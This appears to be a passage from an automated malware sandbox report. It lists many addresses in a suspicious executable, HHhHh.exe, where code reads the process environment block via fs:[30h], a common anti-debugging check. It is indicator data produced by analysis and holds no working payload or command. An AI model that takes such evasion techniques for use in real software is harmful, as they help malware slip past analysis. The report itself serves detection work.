          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01318243 mov ecx, dword ptr fs:[00000030h]4_2_01318243
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A250 mov eax, dword ptr fs:[00000030h]4_2_0128A250
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02A0 mov eax, dword ptr fs:[00000030h]4_2_012A02A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02A0 mov eax, dword ptr fs:[00000030h]4_2_012A02A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov ecx, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE284 mov eax, dword ptr fs:[00000030h]4_2_012CE284
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE284 mov eax, dword ptr fs:[00000030h]4_2_012CE284
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01326500 mov eax, dword ptr fs:[00000030h]4_2_01326500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298550 mov eax, dword ptr fs:[00000030h]4_2_01298550
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298550 mov eax, dword ptr fs:[00000030h]4_2_01298550
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B45B1 mov eax, dword ptr fs:[00000030h]4_2_012B45B1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B45B1 mov eax, dword ptr fs:[00000030h]4_2_012B45B1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C4588 mov eax, dword ptr fs:[00000030h]4_2_012C4588
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292582 mov eax, dword ptr fs:[00000030h]4_2_01292582
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292582 mov ecx, dword ptr fs:[00000030h]4_2_01292582
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE59C mov eax, dword ptr fs:[00000030h]4_2_012CE59C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC5ED mov eax, dword ptr fs:[00000030h]4_2_012CC5ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC5ED mov eax, dword ptr fs:[00000030h]4_2_012CC5ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012925E0 mov eax, dword ptr fs:[00000030h]4_2_012925E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE5CF mov eax, dword ptr fs:[00000030h]4_2_012CE5CF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE5CF mov eax, dword ptr fs:[00000030h]4_2_012CE5CF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012965D0 mov eax, dword ptr fs:[00000030h]4_2_012965D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA5D0 mov eax, dword ptr fs:[00000030h]4_2_012CA5D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA5D0 mov eax, dword ptr fs:[00000030h]4_2_012CA5D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E420 mov eax, dword ptr fs:[00000030h]4_2_0128E420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E420 mov eax, dword ptr fs:[00000030h]4_2_0128E420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E420 mov eax, dword ptr fs:[00000030h]4_2_0128E420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128C427 mov eax, dword ptr fs:[00000030h]4_2_0128C427
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316420 mov eax, dword ptr fs:[00000030h]4_2_01316420
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA430 mov eax, dword ptr fs:[00000030h]4_2_012CA430
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C8402 mov eax, dword ptr fs:[00000030h]4_2_012C8402
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C8402 mov eax, dword ptr fs:[00000030h]4_2_012C8402
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C8402 mov eax, dword ptr fs:[00000030h]4_2_012C8402
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131C460 mov ecx, dword ptr fs:[00000030h]4_2_0131C460
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BA470 mov eax, dword ptr fs:[00000030h]4_2_012BA470
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BA470 mov eax, dword ptr fs:[00000030h]4_2_012BA470
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BA470 mov eax, dword ptr fs:[00000030h]4_2_012BA470
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE443 mov eax, dword ptr fs:[00000030h]4_2_012CE443
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B245A mov eax, dword ptr fs:[00000030h]4_2_012B245A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128645D mov eax, dword ptr fs:[00000030h]4_2_0128645D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131A4B0 mov eax, dword ptr fs:[00000030h]4_2_0131A4B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012964AB mov eax, dword ptr fs:[00000030h]4_2_012964AB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C44B0 mov ecx, dword ptr fs:[00000030h]4_2_012C44B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012904E5 mov ecx, dword ptr fs:[00000030h]4_2_012904E5
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130C730 mov eax, dword ptr fs:[00000030h]4_2_0130C730
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC720 mov eax, dword ptr fs:[00000030h]4_2_012CC720
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC720 mov eax, dword ptr fs:[00000030h]4_2_012CC720
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C273C mov eax, dword ptr fs:[00000030h]4_2_012C273C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C273C mov ecx, dword ptr fs:[00000030h]4_2_012C273C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C273C mov eax, dword ptr fs:[00000030h]4_2_012C273C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC700 mov eax, dword ptr fs:[00000030h]4_2_012CC700
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290710 mov eax, dword ptr fs:[00000030h]4_2_01290710
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C0710 mov eax, dword ptr fs:[00000030h]4_2_012C0710
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298770 mov eax, dword ptr fs:[00000030h]4_2_01298770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0770 mov eax, dword ptr fs:[00000030h]4_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C674D mov esi, dword ptr fs:[00000030h]4_2_012C674D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C674D mov eax, dword ptr fs:[00000030h]4_2_012C674D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C674D mov eax, dword ptr fs:[00000030h]4_2_012C674D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01314755 mov eax, dword ptr fs:[00000030h]4_2_01314755
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131E75D mov eax, dword ptr fs:[00000030h]4_2_0131E75D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290750 mov eax, dword ptr fs:[00000030h]4_2_01290750
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2750 mov eax, dword ptr fs:[00000030h]4_2_012D2750
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2750 mov eax, dword ptr fs:[00000030h]4_2_012D2750
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012907AF mov eax, dword ptr fs:[00000030h]4_2_012907AF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133678E mov eax, dword ptr fs:[00000030h]4_2_0133678E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B27ED mov eax, dword ptr fs:[00000030h]4_2_012B27ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B27ED mov eax, dword ptr fs:[00000030h]4_2_012B27ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B27ED mov eax, dword ptr fs:[00000030h]4_2_012B27ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131E7E1 mov eax, dword ptr fs:[00000030h]4_2_0131E7E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012947FB mov eax, dword ptr fs:[00000030h]4_2_012947FB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012947FB mov eax, dword ptr fs:[00000030h]4_2_012947FB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129C7C0 mov eax, dword ptr fs:[00000030h]4_2_0129C7C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013107C3 mov eax, dword ptr fs:[00000030h]4_2_013107C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129262C mov eax, dword ptr fs:[00000030h]4_2_0129262C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C6620 mov eax, dword ptr fs:[00000030h]4_2_012C6620
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C8620 mov eax, dword ptr fs:[00000030h]4_2_012C8620
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE627 mov eax, dword ptr fs:[00000030h]4_2_012AE627
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A260B mov eax, dword ptr fs:[00000030h]4_2_012A260B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2619 mov eax, dword ptr fs:[00000030h]4_2_012D2619
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E609 mov eax, dword ptr fs:[00000030h]4_2_0130E609
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA660 mov eax, dword ptr fs:[00000030h]4_2_012CA660
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA660 mov eax, dword ptr fs:[00000030h]4_2_012CA660
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C2674 mov eax, dword ptr fs:[00000030h]4_2_012C2674
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135866E mov eax, dword ptr fs:[00000030h]4_2_0135866E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135866E mov eax, dword ptr fs:[00000030h]4_2_0135866E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AC640 mov eax, dword ptr fs:[00000030h]4_2_012AC640
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC6A6 mov eax, dword ptr fs:[00000030h]4_2_012CC6A6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C66B0 mov eax, dword ptr fs:[00000030h]4_2_012C66B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294690 mov eax, dword ptr fs:[00000030h]4_2_01294690
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294690 mov eax, dword ptr fs:[00000030h]4_2_01294690
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013106F1 mov eax, dword ptr fs:[00000030h]4_2_013106F1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013106F1 mov eax, dword ptr fs:[00000030h]4_2_013106F1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E6F2 mov eax, dword ptr fs:[00000030h]4_2_0130E6F2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E6F2 mov eax, dword ptr fs:[00000030h]4_2_0130E6F2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E6F2 mov eax, dword ptr fs:[00000030h]4_2_0130E6F2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E6F2 mov eax, dword ptr fs:[00000030h]4_2_0130E6F2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA6C7 mov ebx, dword ptr fs:[00000030h]4_2_012CA6C7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA6C7 mov eax, dword ptr fs:[00000030h]4_2_012CA6C7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0132892B mov eax, dword ptr fs:[00000030h]4_2_0132892B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131892A mov eax, dword ptr fs:[00000030h]4_2_0131892A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131C912 mov eax, dword ptr fs:[00000030h]4_2_0131C912
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01288918 mov eax, dword ptr fs:[00000030h]4_2_01288918
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01288918 mov eax, dword ptr fs:[00000030h]4_2_01288918
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E908 mov eax, dword ptr fs:[00000030h]4_2_0130E908
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E908 mov eax, dword ptr fs:[00000030h]4_2_0130E908
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D096E mov eax, dword ptr fs:[00000030h]4_2_012D096E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D096E mov edx, dword ptr fs:[00000030h]4_2_012D096E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D096E mov eax, dword ptr fs:[00000030h]4_2_012D096E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B6962 mov eax, dword ptr fs:[00000030h]4_2_012B6962
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B6962 mov eax, dword ptr fs:[00000030h]4_2_012B6962
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B6962 mov eax, dword ptr fs:[00000030h]4_2_012B6962
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01334978 mov eax, dword ptr fs:[00000030h]4_2_01334978
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01334978 mov eax, dword ptr fs:[00000030h]4_2_01334978
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131C97C mov eax, dword ptr fs:[00000030h]4_2_0131C97C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310946 mov eax, dword ptr fs:[00000030h]4_2_01310946
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013189B3 mov esi, dword ptr fs:[00000030h]4_2_013189B3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013189B3 mov eax, dword ptr fs:[00000030h]4_2_013189B3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013189B3 mov eax, dword ptr fs:[00000030h]4_2_013189B3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012909AD mov eax, dword ptr fs:[00000030h]4_2_012909AD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012909AD mov eax, dword ptr fs:[00000030h]4_2_012909AD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A29A0 mov eax, dword ptr fs:[00000030h]4_2_012A29A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A29A0 mov eax, dword ptr fs:[00000030h]4_2_012A29A0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012A29A0 mov eax, dword ptr fs:[00000030h] | 4_2_012A29A0 (listed 11 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0131E9E0 mov eax, dword ptr fs:[00000030h] | 4_2_0131E9E0
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012C29F9 mov eax, dword ptr fs:[00000030h] | 4_2_012C29F9 (listed 2 times)
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0135A9D3 mov eax, dword ptr fs:[00000030h] | 4_2_0135A9D3
